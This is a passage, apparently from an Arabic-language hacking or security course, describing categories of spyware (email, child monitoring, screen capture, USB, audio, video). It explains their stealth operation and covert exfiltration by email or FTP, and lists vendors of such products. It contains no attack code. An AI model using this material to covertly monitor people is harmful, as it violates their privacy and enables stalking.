ﺗﻣت ﻛﺗﺎﺑﺗﮭﺎ ،ﻓﺗﺢ اﻟﻣﺳﺗﻧدات ،ﻓﺗﺢ اﻟﻧواﻓذ ،واﻟﺗطﺑﯾﻘﺎت اﻟﻣﻧﻔذة .ﯾﺑدأ ﺗﻠﻘﺎﺋﯾﺎ ﻣﻊ ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم ،وﯾﻌﻣل ﺳرا ،وﯾرﺳل اﻟﺗﻘﺎرﯾر إﻟﻰ ﺳﺟل
ﺑرﯾدك اﻹﻟﻛﺗروﻧﻲ أو .FTPﯾﻣﻛﻧك اﻟﺗﺣﻘﻖ ﻣن ھذه اﻟﺗﻘﺎرﯾر ﻓﻲ أي ﻣﻛﺎن ﺗرﯾد.
Internet and email Spywareﯾﻘوم ﺑﺗﺳﺟﯾل ﻛﻣﺎ ﯾﻘوم ﺑﺎﺳﺗﻌراض ﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻣﺛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ،
وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ،واﻷﻗراص ،واﻟﮭواﺗف اﻟﻣﺣﻣوﻟﺔ .ﺣﺗﻰ أﻧﮫ ﯾﺣﻣﻲ ﻋﺎﺋﻠﺗك ﻣن ﺧطر اﻻﻧﺗرﻧت وﯾﺣﻔظ اﻟﺷرﻛﺔ ﻣن
اﻟﻣﺧﺎطر واﻟﺧﺳﺎﺋر .وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻹﻧﺗرﻧت واﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
eBLASTER available at http://www.spectorsoft.com
Imonitor Employee Activity available at http://www.employee-monitoring-software.cc
Employee monitoring available at http://employeemonitoring.net
OsMonitor available at http://www.os-monitor.com
Ascendant NFM available at http://www.ascendant-security.com
Spylab WebSpy available at http://www.spylab.org
Personal Inspector available at http://www.spyarsenal.com
Cyberspy available at http://www.cyberspysoftware.com
AceSpy available at http://www.acespy.com
Emailobserver available at http://www.softsecurity.com
Child Monitoring Spyware
Child monitoring spywareﺗﺳﻣﺢ ﻟك ﺑﺗﺗﺑﻊ و ﻣراﻗﺑﺔ ﻣﺎ ﯾﻘوم ﺑﮫ أطﻔﺎﻟك ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺳواء ﻣﺗﺻﻼ ﺑﺎﻷﻧﺗرﻧت أو ﻏﯾر ﻣﺗﺻل .ﻓﺑدﻻ
ﻣن اﻟﻧظر ﻋﻠﻰ ﻣﺎ ﯾﻘوم ﺑﮫ اﻟطﻔل ﻓﻲ ﻣرات ﻋده ،ﻓﯾﻣﻛن ﻟﻠﻣرء اﺳﺗﺧدام Child monitoring spywareﻓﻲ ﻣﻌرﻓﺔ ﻛﯾﻔﯾﺔ ﻗﺿﺎء اﻟوﻗت
ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .ھذا ﯾﻌﻣل ﻓﻲ وﺿﻊ اﻟﺷﺑﺢ) (Stealth mode؛ أطﻔﺎﻟك ﺳوف ﻻ ﯾﻌﻠﻣون ﺑﺣﻘﯾﻘﺔ أﻧك ﺗﺷﺎھدھم .ﺑﻌد اﻟﺗﺛﺑﯾت ،ﻓﺎن ھذا
اﻟﺗطﺑﯾﻖ ﯾﻘوم ﺑﺗﺳﺟﯾل اﻟﺑراﻣﺞ اﻟﻣﺳﺗﺧدﻣﺔ ،واﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ،وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﻧﻘرات اﻟﻣﺎوس ،وأﺧذ ﻟﻘطﺎت ﻣن اﻟﻧﺷﺎط اﻟﺗﻲ
ﺗظﮭر ﻋﻠﻰ اﻟﺷﺎﺷﺔ .ﺟﻣﯾﻊ اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﺧﻼل واﺟﮭﺔ اﻟوﯾب اﻟﻣﺣﻣﯾﺔ ﺑﻛﻠﻣﺔ ﻣرور.
ھذا ﯾﺳﻣﺢ ﻟك أﯾﺿﺎ ﺑﺣﻣﺎﯾﺔ أطﻔﺎﻟك ﻣن اﻟوﺻول إﻟﻰ ﻣﺣﺗوى وﯾب ﻏﯾر ﻣﻧﺎﺳب ﻣن ﺧﻼل وﺿﻊ اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ اﻟﻣﺣددة اﻟﺗﻲ ﺗرﯾد ﻣﻧﻌﮭﺎ.
ﺣﯾث ﯾﻘوم ھذا اﻟﺗطﺑﯾﻖ ﺑﺈرﺳﺎل ﺗﻧﺑﯾﮫ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻛﻠﻣﺎ واﺟﮭت ﻛﻠﻣﺎت رﺋﯾﺳﯾﺔ ﻣﺣددة ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك أو ﻛﻠﻣﺎ أراد
أطﻔﺎﻟك اﻟوﺻول اﻟﻰ ﻣﺣﺗوى ﻏﯾر ﻻﺋﻖ .ﻛﻣﺎ أﻧﮫ ﯾﺳﺟل اﻷﻧﺷطﺔ اﻟﻣﺧﺗﺎرة ،ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﻠﻘطﺎت ،وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ،وﻣواﻗﻊ اﻻﻧﺗرﻧت.
Child monitoring spywareﺗﺳﺟل ﺟﻣﯾﻊ أﻧﺷطﺔ طﻔﻠك ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر وﯾوﻓر ﻟﮭم إﻣﺎ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻣﺷﻔرة أو ﯾرﺳل إﻟﻰ ﻋﻧوان
اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد .ﻛﻣﺎ ﯾﺳﺟل اﻟوﻗت اﻟذي ﺗم ﻓﺗﺢ اﻟﺗطﺑﯾﻘﺎت ﻓﯾﮫ ،ﻣﻘدار اﻟوﻗت اﻟذي ﯾﻧﻔﻖ ﻋﻠﻰ اﻹﻧﺗرﻧت أو اﻟﻛﻣﺑﯾوﺗر ،ﻣﺎ ﯾﻔﻌﻠوﻧﮫ ﻋﻠﻰ
اﻟﻛﻣﺑﯾوﺗر ،وھﻠم ﺟرا.
Screen capturing spywareھﻲ ﺑراﻣﺞ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر أو أﺧذ ﻟﻘطﺎت screenshotﻣن اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم
ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ ﻋﻠﯾﮫ .ھذا ﯾﺄﺧذ ﻟﻘطﺎت ﻣن اﻟﻛﻣﺑﯾوﺗر ﻣﺣﻠﻲ أو اﻟﺑﻌﯾد ﻋﻠﻰ ﻓﺗرات زﻣﻧﯾﺔ ﻣﺣددة وﯾوﻓرھم إﻣﺎ ﻋﻠﻰ اﻟﻘرص اﻟﻣﺣﻠﻲ ﻓﻲ ﻣﻠف
ﻣﺧﻔﻲ ﻟﻠﻣراﺟﻌﺔ ﻓﻲ وﻗت ﻻﺣﻖ أو ﯾرﺳﻠﮭﺎ إﻟﻰ أﺣد اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺧﻼل ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو FTPاﻟﻣﺣدد ﻣﺳﺑﻘﺎ.
Screen capturing spywareﻟﯾس ﻓﻘط ﻗﺎدرا ً ﻋﻠﻰ اﻟﺗﻘﺎط ﻟﻘطﺎت وﻟﻛن أﯾﺿﺎ ﯾﻠﺗﻘط ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ،ﻧﺷﺎط اﻟﻣﺎوس ،ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ
ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ،وأﻧﺷطﺔ اﻟطﺎﺑﻌﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ .ﯾﻣﻛن ﺗﺛﺑﯾت ھذا اﻟﺑرﻧﺎﻣﺞ أو اﻟﺑراﻣﺞ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر
اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ ﻟرﺻد أﻧﺷطﺔ ﺟﻣﯾﻊ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻣن ﺧﻼل أﺧذ ﻟﻘطﺎت اﻟﺷﺎﺷﺔ .ھذا ﯾﻌﻣل ﻓﻲ وﺿﻊ
اﻟﺷﺑﺢ ) (stealth modeﺣﺗﻰ ﺗﺗﻣﻛن ﻣن رﺻد أﻧﺷطﺔ أي ﺷﺧص ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر دون ﻋﻠﻣﮭم.
ﻣﻊ ھذه اﻟﺑراﻣﺞ ،ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻣراﻗﺑﺔ ﻛﻣﺑﯾوﺗر وﺗﺣدﯾد أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻷﻧﮭﺎ ﺗﺑﺣث ﻓﻲ اﻟﻛﻣﺑﯾوﺗر) .(liveﯾدار ھذا
اﻟﺑرﻧﺎﻣﺞ ﺑﺷﻔﺎﻓﯾﺔ ﻓﻲ اﻟﺧﻠﻔﯾﺔ .ﻓﺈﻧﮫ ﯾﺄﺧذ ﻟﻘطﺎت ﻟﻛل ﺗطﺑﯾﻖ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺗم ﻓﺗﺣﮫ ﺑﺣﯾث ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﺗﻌرف ﻋﻠﻰ ﻛل ﻋﻣل ﻋﻠﻰ
اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ.
Screen Capturing Spyware: SoftActivity TS Monitor
اﻟﻣﺻدرhttp://www.softactivity.com :
SoftActivity TS Monitorھو terminal-server sessionsواﻟذى ﯾﺳﺟل ﻟﻘطﺎت ﻟﻛل ﻋﻣل اﻟﻣﺳﺗﺧدم .ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ
أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم اﻟﺑﻌﯾد ﻋﻠﻰ ﻣﻠﻘم اﻟﺗرﻣﻧﺎل ) (Windows terminal serverاﻟﺧﺎص ﺑك وﻣراﻗﺑﺔ ﻣوظﻔﯾك اﻟذﯾن ﯾﻌﻣﻠون ﻣن اﻟﻣﻧزل أو
اﻟﻣﻧﺎطﻖ ﻋن ﺑﻌد او ﻣن ﺧﻼل رﺣﻼت اﻟﻌﻣل ﻋﺑر .RDPھذا ﯾﻣﻛن أﯾﺿﺎ ﻣراﻗﺑﺔ ﻣﺎ ﯾﻔﻌﻠﮫ اﻟﻣﺳﺗﺧدﻣون ﻋﻠﻰ ﺷﺑﻛﺔ اﻟﻌﻣﯾل ،دون ﺗرﻛﯾب أي
ﺑرﻧﺎﻣﺞ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل .ﯾﻣﻛﻧﮫ أﯾﺿﺎ ﺗوﺛﯾﻖ اﻟﺗﻐﯾرات ﻋﻠﻰ إﻋداد اﻟﺧوادم ﻋن طرﯾﻖ ﺗﺳﺟﯾل اﻟﺟﻠﺳﺎت اﻹدارﯾﺔ اﻟﺑﻌﯾدة واﻟﻣﺣﻠﯾﺔ .ﯾﻣﻛن
أﯾﺿﺎ ﺗﺄﻣﯾن ﺑﯾﺎﻧﺎت اﻟﺷرﻛﺎت ﻋن طرﯾﻖ ﻣﻧﻊ ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻣن ﻗﺑل اﻟﻣطﻠﻌﯾن .زﯾﺎدة إﻧﺗﺎﺟﯾﺔ اﻟﻣوظﻔﯾن وﺗﺣﺳﯾن اﻷﻣن .ھذا terminal
server monitoring softwareﺗﻛون ﻏﯾر ﻣرﺋﯾﺔ ﺗﻣﺎﻣﺎ ﻟﻠﻣﺳﺗﺧدﻣﯾن.
Screen capturing spywareھو اﻟﺑرﻧﺎﻣﺞ اﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر ﻟطﻔﻠك أو اﻟﻌﺎﻣﻠﯾن ﺑﮭﺎ أو أﺧذ ﻟﻘطﺎت
Screenshotﻟﻠﻛل وﻟﻛل ﺗطﺑﯾﻖ ﺗم ﻓﺗﺣﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺛﺑت ﻋﻠﯾﮫ اﻟﺑرﻧﺎﻣﺞ .وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن Screen capturing
spywareﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
Desktop Spy available at http://www.spyarsenal.com
IcyScreen available at http://www.16software.com
Spector Pro available at http://www.spectorsoft.com
PC Tattletale available at http://www.pctattletale.com
Computer Screen Spy Monitor available at http://www.mysuperspy.com
PC Screen Spy Monitor available at http://ematrixsoft.com
USB spywareھو ﺑرﻧﺎﻣﺞ أو ﺑرﻣﺟﯾﺎت ﻣﺻﻣﻣﺔ ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر و ﺗﺧﻔﻰ ﻓﻲ ﺟﮭﺎز USB spyware. USBﯾﻧﺳﺦ ﻣﻠﻔﺎت
اﻟﺗﺟﺳس ﻣن أﺟﮭزة USBإﻟﻰ اﻟﻘرص اﻟﺛﺎﺑت دون أي طﻠب أو إﻋﻼم .ھذا ﯾﻌﻣل ﺑطرﯾﻘﺔ ﺧﻔﯾﺔ وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر ﻻ ﯾﻛون ﻋﻠﻰ
ﺑﯾﻧﺔ ﻣن وﺟود ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم.
ﯾوﻓر USB spywareﺣﻠول ﻣﺗﻌدد اﻷوﺟﮫ ﻓﻲ ﻣﺣﺎﻓظ اﺗﺻﺎﻻت USB spyware. USBﻗﺎدر ﻋﻠﻰ رﺻد ﻧﺷﺎط أﺟﮭزة USBدون إﻧﺷﺎء
ﻓﻼﺗر إﺿﺎﻓﯾﺔ أو اﺟﮭزه ) (deviceو ﻏﯾرھﺎ ،واﻟﺗﻲ ﻗد ﺗﺿر ﺑﮭﯾﻛل اﻟﻧظﺎم.
USB spywareﯾﺗﯾﺢ ﻟك اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل و ﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﻧﻘﻠﮭﺎ ﺑﯾن أي ﺟﮭﺎز USBﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت.
وھذا ﯾﺗﯾﺢ اﻟﻌﻣل ﻋﻠﻰ ﺗطوﯾر ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز أو اﻷﺟﮭزة ،واﻟذي ﯾوﻓر ﻣﻧﺻﺔ ﻗوﯾﺔ ﻟﻠﻛود اﻟﻔﻌﺎل واﻻﺧﺗﺑﺎر واﻟﺗﺣﺳﯾن وﯾﺟﻌﻠﮭﺎ أداة
ﻋظﯾﻣﺔ ﻟﺗﺻﺣﯾﺢ أﺧطﺎء اﻟﺑرﻣﺟﯾﺎت.
ﻓﺈﻧﮫ ﯾﻠﺗﻘط ﺟﻣﯾﻊ اﻻﺗﺻﺎﻻت ﺑﯾن ﺟﮭﺎز USBوﻣﺿﯾﻔﮫ وﺣﻔظﮭﺎ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻟﻠﻣراﺟﻌﺔ ﻓﻲ وﻗت ﻻﺣﻖ .ﯾﻌرض ﺳﺟل ﺗﻔﺻﯾﻠﻲ ﻣﻠﺧﺻﺎ ﻟﻛل
ﻣﻌﺎﻣﻼت اﻟﺑﯾﺎﻧﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﻣﻌﻠوﻣﺎت اﻟدﻋم .ﯾﺳﺗﺧدم USB spywareﻗﻠﯾﻼ ﻣن ﻣوارد اﻟﻧظﺎم ﻣن اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف .ھذا ﯾﻌﻣل ﻣﻊ
اﻟطﺎﺑﻊ اﻟزﻣﻧﻲ اﻟﺧﺎﺻﺔ ﺑﮫ ﻟﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻓﻲ ﺗﺳﻠﺳل اﻻﺗﺻﺎﻻت.
USB spywareﻻ ﯾﺣﺗوي ﻋﻠﻰ adwareأو .spywareوھﻲ ﺗﻌﻣل ﻣﻊ ﻣﻌظم اﻻﺻدارات اﻷﺧﯾرة ﻣن اﻟوﯾﻧدوز.
USB spyware -ﯾﻧﺳﺦ اﻟﻣﻠﻔﺎت ﻣن أﺟﮭزة USBإﻟﻰ اﻟﻘرص اﻟﺛﺎﺑت ﻓﻲ ﺧﻔﯾﺔ ﻣن دون أي طﻠب.
-ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف ﻣﺧﻔﻲ/ﻣﺟﻠد ﻣﻊ اﻟﺗﺎرﯾﺦ اﻟﺣﺎﻟﻲ واﻟﺑدا ﻣن ﻋﻣﻠﯾﺔ اﻟﻧﺳﺦ اﻟﺧﻠﻔﻲ ).(background copies
-ﺗﺗﯾﺢ ﻟك اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل وﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﻣﻧﻘوﻟﺔ ﺑﯾن أي ﺟﮭﺎز USBﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت.
USB Spyware: USBSpy
اﻟﻣﺻدرhttp://www.everstrike.com :
USBSpyﺗﻣﻛﻧك ﻣن اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل وﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﻧﻘﻠﮭﺎ ﺑﯾن أي ﺟﮭﺎز USBﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت .وھذا
ﯾﺟﻌﻠﮭﺎ أداة ﻋظﯾﻣﺔ ﻟﺗﺻﺣﯾﺢ أﺧطﺎء اﻟﺑرﻣﺟﯾﺎت ،واﻟﻌﻣل ﻋﻠﻰ ﺗطوﯾر ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز أو اﻷﺟﮭزة ،وﯾوﻓر ﻣﻧﺻﺔ ﻗوﯾﺔ ﻟﺗرﻣﯾز ﻓﻌﺎل
واﻻﺧﺗﺑﺎر واﻟﺗﺣﺳﯾن .ﯾﺟﻌل ﺣرﻛﺔ اﻟﻣرور (USB Traffic) USBﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﺑﺳﮭوﻟﺔ ﻷﻏراض اﻟﺗﺣﻠﯾل واﻟﺗﺻﺣﯾﺢ .ﯾﻣﻛﻧﮫ اﻟﻔﻠﺗرة
ﺣﺗﻰ ﯾﻘدم اﻟﺑﯾﺎﻧﺎت اﻟﻣطﻠوﺑﺔ ﻓﻘط .ذات واﺟﮭﺔ ﯾﺟﻌل ﺗﺗﺑﻊ اﻻﺗﺻﺎﻻت ﺑﺳﮭوﻟﮫ.
Audio spywareھﻲ ﺑراﻣﺞ ﻟﻣراﻗﺑﺔ اﻟﺻوت اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻻﻟﺗﻘﺎط اﻟﻣوﺟﺎت اﻟﺻوﺗﯾﺔ أو ﺻوت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر .ﯾﻣﻛن ﺗﺛﺑﯾت ﺑراﻣﺞ
اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر دون اﻟﺣﺻول ﻋﻠﻰ إذن ﻣن ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر .ﯾﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑطرﯾﻘﺔ ﺻﺎﻣﺗﺔ دون
إرﺳﺎل أي إﺷﻌﺎر ﻟﻠﻣﺳﺗﺧدم وﯾﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ ﻟﺗﺳﺟﯾل ﻣﺧﺗﻠف اﻷﺻوات ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺳرا .اﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ﻻ ﯾﺗطﻠب أي
اﻣﺗﯾﺎزات إدارﯾﺔ.
Audio spywareﺗرﺻد وﺗﺳﺟل ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻷﺻوات ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر .ﯾﺗم ﺣﻔظ اﻷﺻوات اﻟﻣﺳﺟﻠﺔ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻋﻠﻰ
اﻟﻘرص اﻟﻣﺣﻠﻲ ﻟﻼﺳﺗرداد ﻓﻲ وﻗت ﻻﺣﻖ .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺎن اﻟﻣﮭﺎﺟﻣﯾن أو اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺿﺎرﯾن ﯾﺳﺗﺧدﻣوا ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ھذه ﻟﻠﺗﺣري
ورﺻد ﺗﺳﺟﯾﻼت اﻟﻣﺣﺎدﺛﺔ ،واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ ،واﻟﺑث اﻹذاﻋﻲ ،واﻟﺗﻲ ﻗد ﺗﺣﺗوي ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ.
Audio spywareﻗﺎدر ﻋﻠﻰ اﻟﺗﺳﺟﯾل واﻟﺗﺟﺳس ﻋﻠﻰ رﺳﺎﺋل اﻟدردﺷﺔ اﻟﺻوﺗﯾﺔ ﻣن ﻣﺧﺗﻠف ﺗطﺑﯾﻘﺎت اﻟدردﺷﺔ ذات اﻟﺷﻌﺑﯾﺔ .ﻣﻊ ﺑراﻣﺞ
ﺗﺟﺳس اﻟﺻوت ھذه ﯾﻣﻛن ﻟﻠﻧﺎس ﻣﺷﺎھدة ﻣوظﻔﯾﮭﺎ أو اﻷطﻔﺎل وﻣﻌرﻓﺔ ﻣن ﯾﺗواﺻﻠوا ﻣﻌﮭم.
Audio spywareﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻣراﻗﺑﺔ أﺟﮭزة اﻟﺻوت اﻟرﻗﻣﯾﺔ ﻣﺛل ﻣﺧﺗﻠف اﻟرﺳل ،اﻟﻣﯾﻛروﻓوﻧﺎت ،واﻟﮭواﺗف اﻟﻣﺣﻣوﻟﺔ .ﻓﺈﻧﮫ ﯾﻣﻛن
ﺗﺳﺟﯾل اﻟﻣﺣﺎدﺛﺎت اﻟﺻوﺗﯾﺔ ﻋن طرﯾﻖ اﻟﺗﻧﺻت وﻣراﻗﺑﺔ ﺟﻣﯾﻊ اﻟﻣﻛﺎﻟﻣﺎت اﻟﺻﺎدرة ingoingو ،واﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ ،اﻟﺦ اﻧﮭﺎ ﺗﺳﻣﺢ ﻟﻠرﺻد
اﻟﻣﻛﺎﻟﻣﺔ اﻟﺣﯾﺔ ،وﻣراﻗﺑﺔ اﻟﺻوت ،ﻣﺳﺎر ،SMSﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻟﻣﻛﺎﻟﻣﺎت ،وﺗﺗﺑﻊ ﺟﻲ ﺑﻲ آر إس.GPRS
Audio Spyware: Spy Voice Recorder
اﻟﻣﺻدرhttp://www.mysuperspy.com :
Spy Voice Recorderھو ﺑرﻧﺎﻣﺞ ﺗﺟﺳس اﻟﻛﻣﺑﯾوﺗر اﻟذي ﯾﺳﻣﺢ ﻟك ﻟرﺻد اﻟﺻوت وﺗﺳﺟﯾل اﻟﺻوت ﻋﻠﻰ اﻟﻧظﺎم .ﻓﺈﻧﮫ ﯾﺳﺟل ﺑﺧﻔﺎء
ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت اﻟﻣﺣرز ﻓﻲ ﺑراﻣﺞ اﻟﻣﺣﺎدﺛﺔ أو ﺑراﻣﺞ اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ ذات ﺷﻌﺑﯾﺔ ﺑﻣﺎ ﻓﻲ ذﻟك أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﺗطﺑﯾﻘﺎت
اﻷﺣﺎدﯾث اﻟﺻوﺗﯾﺔ اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ،Yahoo! Messenger Voice chat ،Skype Voice Chat ،MSN Voice Chat
،QQ Voice Chat ،ICQ Voice Chatاﻟﺦ .ﯾﻣﻛن أﯾﺿﺎ ﺗﺳﺟﯾل اﻻﺻوات اﻟﻣﺗدﻓﻘﺔ اﻷﺧرى ﻣن اﻹﻧﺗرﻧت ،وﻟﻌب اﻟﻣوﺳﯾﻘﻰ وأﺻوات
اﻟﻣﯾﻛروﻓون واﻟﺳﻣﺎﻋﺎت ،اﻟﺦ.
Video Spyware
Video spywareھو ﺑرﻧﺎﻣﺞ ﻟﻠﻣراﻗﺑﺔ اﻟﻔﯾدﯾو .ﻣﻊ ھذا اﻟﺑرﻧﺎﻣﺞ ،ﯾﻣﻛﻧك ﺗﺳﺟﯾل ﻛل ﻧﺷﺎط ﻓﯾدﯾو ﻣﻊ ﺟدول زﻣﻧﻲ ﻣﺑرﻣﺞ .وھذا ﯾﻣﻛن أن ﯾﺗم
ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف دون ﻋﻠم اﻟﻣﺳﺗﺧدم .ﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﺗﻌﻣل ﺑﺷﻔﺎﻓﯾﺔ ﻓﻲ اﻟﺧﻠﻔﯾﺔ ،ﺗﻘوم ﺑرﺻد وﺗﺳﺟﯾل اﻟﻛﺎﻣﯾرات وﻣﺣﺎدﺛﺎت
اﻟﻔﯾدﯾو IMﺳرا .ﻣﯾزة اﻟوﺻول ﻋن ﺑﻌد ﻟﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻻﺗﺻﺎل ﺑﺎﻟﻧظﺎم اﻟﺑﻌﯾد أو اﻟﮭدف ﻣن أﺟل ﺗﻔﻌﯾل اﻟﺗﻧﺑﯾﮭﺎت
واﻷﺟﮭزة اﻟﻛﮭرﺑﺎﺋﯾﺔ وﻣﺷﺎھدة اﻟﺻور اﻟﻣﺳﺟﻠﺔ ﻓﻲ أرﺷﯾف اﻟﻔﯾدﯾو أو ﺣﺗﻰ اﻟﺣﺻول ﻋﻠﻰ ﺻور ﺣﯾﺔ ﻣن ﺟﻣﯾﻊ اﻟﻛﺎﻣﯾرات اﻟﻣﺗﺻﻠﺔ ﻟﮭذا اﻟﻧظﺎم
ﺑﺎﺳﺗﺧدام ﻣﺗﺻﻔﺢ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل اﻧﺗرﻧت اﻛﺳﺑﻠورر.
